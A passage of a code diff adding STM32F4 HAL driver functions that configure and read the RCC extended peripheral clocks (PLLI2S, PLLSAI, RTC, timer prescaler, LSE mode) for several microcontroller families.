vcooutput = (uint32_t)(vcoinput * (((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6U) & (RCC_PLLCFGR_PLLN >> 6U))); + /* I2S_CLK = PLL_VCO Output/PLLR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> 28U) & (RCC_PLLCFGR_PLLR >> 28U))); + break; + } + /* Check if I2S clock selection is HSI or HSE depending from PLL source Clock */ + case RCC_I2SAPBCLKSOURCE_PLLSRC: + { + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + frequency = HSE_VALUE; + } + else + { + frequency = HSI_VALUE; + } + break; + } + /* Clock not enabled for I2S*/ + default: + { + frequency = 0U; + break; + } + } + break; + } + } + return frequency; +} +#endif /* STM32F410Tx || STM32F410Cx || STM32F410Rx */ + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) +/** + * @brief Initializes the RCC extended peripherals clocks according to the specified + * parameters in the RCC_PeriphCLKInitTypeDef. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * contains the configuration information for the Extended Peripherals + * clocks(I2S, SAI, LTDC RTC and TIM). + * + * @note Care must be taken when HAL_RCCEx_PeriphCLKConfig() is used to select + * the RTC clock source; in this case the Backup domain will be reset in + * order to modify the RTC Clock source, as consequence RTC registers (including + * the backup registers) and RCC_BDCR register are set to their reset values. + * + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_PeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tickstart = 0U; + uint32_t tmpreg1 = 0U; + + /* Check the parameters */ + assert_param(IS_RCC_PERIPHCLOCK(PeriphClkInit->PeriphClockSelection)); + + /*----------------------- SAI/I2S Configuration (PLLI2S) -------------------*/ + /*----------------------- Common configuration SAI/I2S ---------------------*/ + /* In Case of SAI or I2S Clock Configuration through PLLI2S, PLLI2SN division + factor is common parameters for both peripherals */ + if((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S) == RCC_PERIPHCLK_I2S) || + (((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI_PLLI2S) == RCC_PERIPHCLK_SAI_PLLI2S) || + (((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_PLLI2S) == RCC_PERIPHCLK_PLLI2S)) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLI2SN_VALUE(PeriphClkInit->PLLI2S.PLLI2SN)); + + /* Disable the PLLI2S */ + __HAL_RCC_PLLI2S_DISABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is disabled */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /*---------------------------- I2S configuration -------------------------*/ + /* In Case of I2S Clock Configuration through PLLI2S, PLLI2SR must be added + only for I2S configuration */ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S) == (RCC_PERIPHCLK_I2S)) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLM) */ + /* I2SCLK = f(PLLI2S clock output) = f(VCO clock) / PLLI2SR */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SR); + } + + /*---------------------------- SAI configuration -------------------------*/ + /* In Case of SAI Clock Configuration through PLLI2S, PLLI2SQ and PLLI2S_DIVQ must + be added only for SAI configuration */ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI_PLLI2S) == (RCC_PERIPHCLK_SAI_PLLI2S)) + { + /* Check the PLLI2S division factors */ + assert_param(IS_RCC_PLLI2SQ_VALUE(PeriphClkInit->PLLI2S.PLLI2SQ)); + assert_param(IS_RCC_PLLI2S_DIVQ_VALUE(PeriphClkInit->PLLI2SDivQ)); + + /* Read PLLI2SR value from PLLI2SCFGR register (this value is not need for SAI configuration) */ + tmpreg1 = ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLM */ + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + /* SAI_CLK(first level) = PLLI2S_VCO Output/PLLI2SQ */ + __HAL_RCC_PLLI2S_SAICLK_CONFIG(PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SQ , tmpreg1); + /* SAI_CLK_x = SAI_CLK(first level)/PLLI2SDIVQ */ + __HAL_RCC_PLLI2S_PLLSAICLKDIVQ_CONFIG(PeriphClkInit->PLLI2SDivQ); + } + + /*----------------- In Case of PLLI2S is just selected -----------------*/ + if((PeriphClkInit->PeriphClockSelection & RCC_PERIPHCLK_PLLI2S) == RCC_PERIPHCLK_PLLI2S) + { + /* Check for Parameters */ + assert_param(IS_RCC_PLLI2SQ_VALUE(PeriphClkInit->PLLI2S.PLLI2SQ)); + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + + /* Configure the PLLI2S multiplication and division factors */ + __HAL_RCC_PLLI2S_SAICLK_CONFIG(PeriphClkInit->PLLI2S.PLLI2SN, PeriphClkInit->PLLI2S.PLLI2SQ, PeriphClkInit->PLLI2S.PLLI2SR); + } + + /* Enable the PLLI2S */ + __HAL_RCC_PLLI2S_ENABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + } + /*--------------------------------------------------------------------------*/ + + /*----------------------- SAI/LTDC Configuration (PLLSAI) ------------------*/ + /*----------------------- Common configuration SAI/LTDC --------------------*/ + /* In Case of SAI or LTDC Clock Configuration through PLLSAI, PLLSAIN division + factor is common parameters for both peripherals */ + if((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI_PLLSAI) == RCC_PERIPHCLK_SAI_PLLSAI) || + (((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_LTDC) == RCC_PERIPHCLK_LTDC)) + { + /* Check the PLLSAI division factors */ + assert_param(IS_RCC_PLLSAIN_VALUE(PeriphClkInit->PLLSAI.PLLSAIN)); + + /* Disable PLLSAI Clock */ + __HAL_RCC_PLLSAI_DISABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLSAI is disabled */ + while(__HAL_RCC_PLLSAI_GET_FLAG() != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /*---------------------------- SAI configuration -------------------------*/ + /* In Case of SAI Clock Configuration through PLLSAI, PLLSAIQ and PLLSAI_DIVQ must + be added only for SAI configuration */ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI_PLLSAI) == (RCC_PERIPHCLK_SAI_PLLSAI)) + { + assert_param(IS_RCC_PLLSAIQ_VALUE(PeriphClkInit->PLLSAI.PLLSAIQ)); + assert_param(IS_RCC_PLLSAI_DIVQ_VALUE(PeriphClkInit->PLLSAIDivQ)); + + /* Read PLLSAIR value from PLLSAICFGR register (this value is not need for SAI configuration) */ + tmpreg1 = ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIR) >> RCC_PLLSAICFGR_PLLSAIR_Pos); + /* PLLSAI_VCO Input = PLL_SOURCE/PLLM */ + /* PLLSAI_VCO Output = PLLSAI_VCO Input * PLLSAIN */ + /* SAI_CLK(first level) = PLLSAI_VCO Output/PLLSAIQ */ + __HAL_RCC_PLLSAI_CONFIG(PeriphClkInit->PLLSAI.PLLSAIN , PeriphClkInit->PLLSAI.PLLSAIQ, tmpreg1); + /* SAI_CLK_x = SAI_CLK(first level)/PLLSAIDIVQ */ + __HAL_RCC_PLLSAI_PLLSAICLKDIVQ_CONFIG(PeriphClkInit->PLLSAIDivQ); + } + + /*---------------------------- LTDC configuration ------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_LTDC) == (RCC_PERIPHCLK_LTDC)) + { + assert_param(IS_RCC_PLLSAIR_VALUE(PeriphClkInit->PLLSAI.PLLSAIR)); + assert_param(IS_RCC_PLLSAI_DIVR_VALUE(PeriphClkInit->PLLSAIDivR)); + + /* Read PLLSAIR value from PLLSAICFGR register (this value is not need for SAI configuration) */ + tmpreg1 = ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> RCC_PLLSAICFGR_PLLSAIQ_Pos); + /* PLLSAI_VCO Input = PLL_SOURCE/PLLM */ + /* PLLSAI_VCO Output = PLLSAI_VCO Input * PLLSAIN */ + /* LTDC_CLK(first level) = PLLSAI_VCO Output/PLLSAIR */ + __HAL_RCC_PLLSAI_CONFIG(PeriphClkInit->PLLSAI.PLLSAIN , tmpreg1, PeriphClkInit->PLLSAI.PLLSAIR); + /* LTDC_CLK = LTDC_CLK(first level)/PLLSAIDIVR */ + __HAL_RCC_PLLSAI_PLLSAICLKDIVR_CONFIG(PeriphClkInit->PLLSAIDivR); + } + /* Enable PLLSAI Clock */ + __HAL_RCC_PLLSAI_ENABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLSAI is ready */ + while(__HAL_RCC_PLLSAI_GET_FLAG() == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- RTC configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_RTC) == (RCC_PERIPHCLK_RTC)) + { + /* Check for RTC Parameters used to output RTCCLK */ + assert_param(IS_RCC_RTCCLKSOURCE(PeriphClkInit->RTCClockSelection)); + + /* Enable Power Clock*/ + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Enable write access to Backup domain */ + PWR->CR |= PWR_CR_DBP; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while((PWR->CR & PWR_CR_DBP) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_DBP_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + /* Reset the Backup domain only if the RTC Clock source selection is modified from reset value */ + tmpreg1 = (RCC->BDCR & RCC_BDCR_RTCSEL); + if((tmpreg1 != 0x00000000U) && ((tmpreg1) != (PeriphClkInit->RTCClockSelection & RCC_BDCR_RTCSEL))) + { + /* Store the content of BDCR register before the reset of Backup Domain */ + tmpreg1 = (RCC->BDCR & ~(RCC_BDCR_RTCSEL)); + /* RTC Clock selection can be changed only if the Backup Domain is reset */ + __HAL_RCC_BACKUPRESET_FORCE(); + __HAL_RCC_BACKUPRESET_RELEASE(); + /* Restore the Content of BDCR register */ + RCC->BDCR = tmpreg1; + + /* Wait for LSE reactivation if LSE was enable prior to Backup Domain reset */ + if(HAL_IS_BIT_SET(RCC->BDCR, RCC_BDCR_LSEON)) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + __HAL_RCC_RTC_CONFIG(PeriphClkInit->RTCClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- TIM configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_TIM) == (RCC_PERIPHCLK_TIM)) + { + __HAL_RCC_TIMCLKPRESCALER(PeriphClkInit->TIMPresSelection); + } + return HAL_OK; +} + +/** + * @brief Configures the PeriphClkInit according to the internal + * RCC configuration registers. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * will be configured. + * @retval None + */ +void HAL_RCCEx_GetPeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tempreg; + + /* Set all possible values for the extended clock type parameter------------*/ + PeriphClkInit->PeriphClockSelection = RCC_PERIPHCLK_I2S | RCC_PERIPHCLK_SAI_PLLSAI | RCC_PERIPHCLK_SAI_PLLI2S | RCC_PERIPHCLK_LTDC | RCC_PERIPHCLK_TIM | RCC_PERIPHCLK_RTC; + + /* Get the PLLI2S Clock configuration -----------------------------------------------*/ + PeriphClkInit->PLLI2S.PLLI2SN = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> RCC_PLLI2SCFGR_PLLI2SN_Pos); + PeriphClkInit->PLLI2S.PLLI2SR = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); + PeriphClkInit->PLLI2S.PLLI2SQ = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SQ) >> RCC_PLLI2SCFGR_PLLI2SQ_Pos); + /* Get the PLLSAI Clock configuration -----------------------------------------------*/ + PeriphClkInit->PLLSAI.PLLSAIN = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIN) >> RCC_PLLSAICFGR_PLLSAIN_Pos); + PeriphClkInit->PLLSAI.PLLSAIR = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIR) >> RCC_PLLSAICFGR_PLLSAIR_Pos); + PeriphClkInit->PLLSAI.PLLSAIQ = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> RCC_PLLSAICFGR_PLLSAIQ_Pos); + /* Get the PLLSAI/PLLI2S division factors -----------------------------------------------*/ + PeriphClkInit->PLLI2SDivQ = (uint32_t)((RCC->DCKCFGR & RCC_DCKCFGR_PLLI2SDIVQ) >> RCC_DCKCFGR_PLLI2SDIVQ_Pos); + PeriphClkInit->PLLSAIDivQ = (uint32_t)((RCC->DCKCFGR & RCC_DCKCFGR_PLLSAIDIVQ) >> RCC_DCKCFGR_PLLSAIDIVQ_Pos); + PeriphClkInit->PLLSAIDivR = (uint32_t)(RCC->DCKCFGR & RCC_DCKCFGR_PLLSAIDIVR); + /* Get the RTC Clock configuration -----------------------------------------------*/ + tempreg = (RCC->CFGR & RCC_CFGR_RTCPRE); + PeriphClkInit->RTCClockSelection = (uint32_t)((tempreg) | (RCC->BDCR & RCC_BDCR_RTCSEL)); + + if ((RCC->DCKCFGR & RCC_DCKCFGR_TIMPRE) == RESET) + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_DESACTIVATED; + } + else + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_ACTIVATED; + } +} + +/** + * @brief Return the peripheral clock frequency for a given peripheral(SAI..) + * @note Return 0 if peripheral clock identifier not managed by this API + * @param PeriphClk Peripheral clock identifier + * This parameter can be one of the following values: + * @arg RCC_PERIPHCLK_I2S: I2S peripheral clock + * @retval Frequency in KHz + */ +uint32_t HAL_RCCEx_GetPeriphCLKFreq(uint32_t PeriphClk) +{ + /* This variable used to store the I2S clock frequency (value in Hz) */ + uint32_t frequency = 0U; + /* This variable used to store the VCO Input (value in Hz) */ + uint32_t vcoinput = 0U; + uint32_t srcclk = 0U; + /* This variable used to store the VCO Output (value in Hz) */ + uint32_t vcooutput = 0U; + switch (PeriphClk) + { + case RCC_PERIPHCLK_I2S: + { + /* Get the current I2S source */ + srcclk = __HAL_RCC_GET_I2S_SOURCE(); + switch (srcclk) + { + /* Check if I2S clock selection is External clock mapped on the I2S_CKIN pin used as I2S clock */ + case RCC_I2SCLKSOURCE_EXT: + { + /* Set the I2S clock to the external clock value */ + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + /* Check if I2S clock selection is PLLI2S VCO output clock divided by PLLI2SR used as I2S clock */ + case RCC_I2SCLKSOURCE_PLLI2S: + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U) & (RCC_PLLI2SCFGR_PLLI2SN >> 6U))); + /* I2S_CLK = PLLI2S_VCO Output/PLLI2SR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> 28U) & (RCC_PLLI2SCFGR_PLLI2SR >> 28U))); + break; + } + /* Clock not enabled for I2S*/ + default: + { + frequency = 0U; + break; + } + } + break; + } + } + return frequency; +} +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx */ + +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx)|| defined(STM32F417xx) ||\ + defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F411xE) +/** + * @brief Initializes the RCC extended peripherals clocks according to the specified parameters in the + * RCC_PeriphCLKInitTypeDef. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * contains the configuration information for the Extended Peripherals clocks(I2S and RTC clocks). + * + * @note A caution to be taken when HAL_RCCEx_PeriphCLKConfig() is used to select RTC clock selection, in this case + * the Reset of Backup domain will be applied in order to modify the RTC Clock source as consequence all backup + * domain (RTC and RCC_BDCR register expect BKPSRAM) will be reset + * + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_PeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tickstart = 0U; + uint32_t tmpreg1 = 0U; + + /* Check the parameters */ + assert_param(IS_RCC_PERIPHCLOCK(PeriphClkInit->PeriphClockSelection)); + + /*---------------------------- I2S configuration ---------------------------*/ + if((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S) == RCC_PERIPHCLK_I2S) || + (((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_PLLI2S) == RCC_PERIPHCLK_PLLI2S)) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + assert_param(IS_RCC_PLLI2SN_VALUE(PeriphClkInit->PLLI2S.PLLI2SN)); +#if defined(STM32F411xE) + assert_param(IS_RCC_PLLI2SM_VALUE(PeriphClkInit->PLLI2S.PLLI2SM)); +#endif /* STM32F411xE */ + /* Disable the PLLI2S */ + __HAL_RCC_PLLI2S_DISABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is disabled */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + +#if defined(STM32F411xE) + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM) */ + /* I2SCLK = f(PLLI2S clock output) = f(VCO clock) / PLLI2SR */ + __HAL_RCC_PLLI2S_I2SCLK_CONFIG(PeriphClkInit->PLLI2S.PLLI2SM, PeriphClkInit->PLLI2S.PLLI2SN, PeriphClkInit->PLLI2S.PLLI2SR); +#else + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLM) */ + /* I2SCLK = f(PLLI2S clock output) = f(VCO clock) / PLLI2SR */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SR); +#endif /* STM32F411xE */ + + /* Enable the PLLI2S */ + __HAL_RCC_PLLI2S_ENABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + } + + /*---------------------------- RTC configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_RTC) == (RCC_PERIPHCLK_RTC)) + { + /* Check for RTC Parameters used to output RTCCLK */ + assert_param(IS_RCC_RTCCLKSOURCE(PeriphClkInit->RTCClockSelection)); + + /* Enable Power Clock*/ + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Enable write access to Backup domain */ + PWR->CR |= PWR_CR_DBP; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while((PWR->CR & PWR_CR_DBP) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_DBP_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + /* Reset the Backup domain only if the RTC Clock source selection is modified from reset value */ + tmpreg1 = (RCC->BDCR & RCC_BDCR_RTCSEL); + if((tmpreg1 != 0x00000000U) && ((tmpreg1) != (PeriphClkInit->RTCClockSelection & RCC_BDCR_RTCSEL))) + { + /* Store the content of BDCR register before the reset of Backup Domain */ + tmpreg1 = (RCC->BDCR & ~(RCC_BDCR_RTCSEL)); + /* RTC Clock selection can be changed only if the Backup Domain is reset */ + __HAL_RCC_BACKUPRESET_FORCE(); + __HAL_RCC_BACKUPRESET_RELEASE(); + /* Restore the Content of BDCR register */ + RCC->BDCR = tmpreg1; + + /* Wait for LSE reactivation if LSE was enable prior to Backup Domain reset */ + if(HAL_IS_BIT_SET(RCC->BDCR, RCC_BDCR_LSEON)) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + __HAL_RCC_RTC_CONFIG(PeriphClkInit->RTCClockSelection); + } +#if defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F411xE) + /*---------------------------- TIM configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_TIM) == (RCC_PERIPHCLK_TIM)) + { + __HAL_RCC_TIMCLKPRESCALER(PeriphClkInit->TIMPresSelection); + } +#endif /* STM32F401xC || STM32F401xE || STM32F411xE */ + return HAL_OK; +} + +/** + * @brief Configures the RCC_OscInitStruct according to the internal + * RCC configuration registers. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * will be configured. + * @retval None + */ +void HAL_RCCEx_GetPeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tempreg; + + /* Set all possible values for the extended clock type parameter------------*/ + PeriphClkInit->PeriphClockSelection = RCC_PERIPHCLK_I2S | RCC_PERIPHCLK_RTC; + + /* Get the PLLI2S Clock configuration --------------------------------------*/ + PeriphClkInit->PLLI2S.PLLI2SN = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> RCC_PLLI2SCFGR_PLLI2SN_Pos); + PeriphClkInit->PLLI2S.PLLI2SR = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); +#if defined(STM32F411xE) + PeriphClkInit->PLLI2S.PLLI2SM = (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM); +#endif /* STM32F411xE */ + /* Get the RTC Clock configuration -----------------------------------------*/ + tempreg = (RCC->CFGR & RCC_CFGR_RTCPRE); + PeriphClkInit->RTCClockSelection = (uint32_t)((tempreg) | (RCC->BDCR & RCC_BDCR_RTCSEL)); + +#if defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F411xE) + /* Get the TIM Prescaler configuration -------------------------------------*/ + if ((RCC->DCKCFGR & RCC_DCKCFGR_TIMPRE) == RESET) + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_DESACTIVATED; + } + else + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_ACTIVATED; + } +#endif /* STM32F401xC || STM32F401xE || STM32F411xE */ +} + +/** + * @brief Return the peripheral clock frequency for a given peripheral(SAI..) + * @note Return 0 if peripheral clock identifier not managed by this API + * @param PeriphClk Peripheral clock identifier + * This parameter can be one of the following values: + * @arg RCC_PERIPHCLK_I2S: I2S peripheral clock + * @retval Frequency in KHz + */ +uint32_t HAL_RCCEx_GetPeriphCLKFreq(uint32_t PeriphClk) +{ + /* This variable used to store the I2S clock frequency (value in Hz) */ + uint32_t frequency = 0U; + /* This variable used to store the VCO Input (value in Hz) */ + uint32_t vcoinput = 0U; + uint32_t srcclk = 0U; + /* This variable used to store the VCO Output (value in Hz) */ + uint32_t vcooutput = 0U; + switch (PeriphClk) + { + case RCC_PERIPHCLK_I2S: + { + /* Get the current I2S source */ + srcclk = __HAL_RCC_GET_I2S_SOURCE(); + switch (srcclk) + { + /* Check if I2S clock selection is External clock mapped on the I2S_CKIN pin used as I2S clock */ + case RCC_I2SCLKSOURCE_EXT: + { + /* Set the I2S clock to the external clock value */ + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + /* Check if I2S clock selection is PLLI2S VCO output clock divided by PLLI2SR used as I2S clock */ + case RCC_I2SCLKSOURCE_PLLI2S: + { +#if defined(STM32F411xE) + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } +#else + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } +#endif /* STM32F411xE */ + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U) & (RCC_PLLI2SCFGR_PLLI2SN >> 6U))); + /* I2S_CLK = PLLI2S_VCO Output/PLLI2SR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> 28U) & (RCC_PLLI2SCFGR_PLLI2SR >> 28U))); + break; + } + /* Clock not enabled for I2S*/ + default: + { + frequency = 0U; + break; + } + } + break; + } + } + return frequency; +} +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx || STM32F401xC || STM32F401xE || STM32F411xE */ + +#if defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) || defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) ||\ + defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Select LSE mode + * + * @note This mode is only available for STM32F410xx/STM32F411xx/STM32F446xx/STM32F469xx/STM32F479xx/STM32F412Zx/STM32F412Vx/STM32F412Rx/STM32F412Cx devices. + * + * @param Mode specifies the LSE mode. + * This parameter can be one of the following values: + * @arg RCC_LSE_LOWPOWER_MODE: LSE oscillator in low power mode selection + * @arg RCC_LSE_HIGHDRIVE_MODE: LSE oscillator in High Drive mode selection + * @retval None + */ +void HAL_RCCEx_SelectLSEMode(uint8_t Mode) +{ + /* Check the parameters */ + assert_param(IS_RCC_LSE_MODE(Mode)); + if(Mode == RCC_LSE_HIGHDRIVE_MODE) + { + SET_BIT(RCC->BDCR, RCC_BDCR_LSEMOD); + } + else + { + CLEAR_BIT(RCC->BDCR, RCC_BDCR_LSEMOD); + } +} + +#endif /* STM32F410xx || STM32F411xE || STM32F446xx || STM32F469xx || STM32F479xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx || STM32F413xx || STM32F423xx */ + +/** @defgroup RCCEx_Exported_Functions_Group2 Extended Clock management functions + * @brief Extended Clock management functions 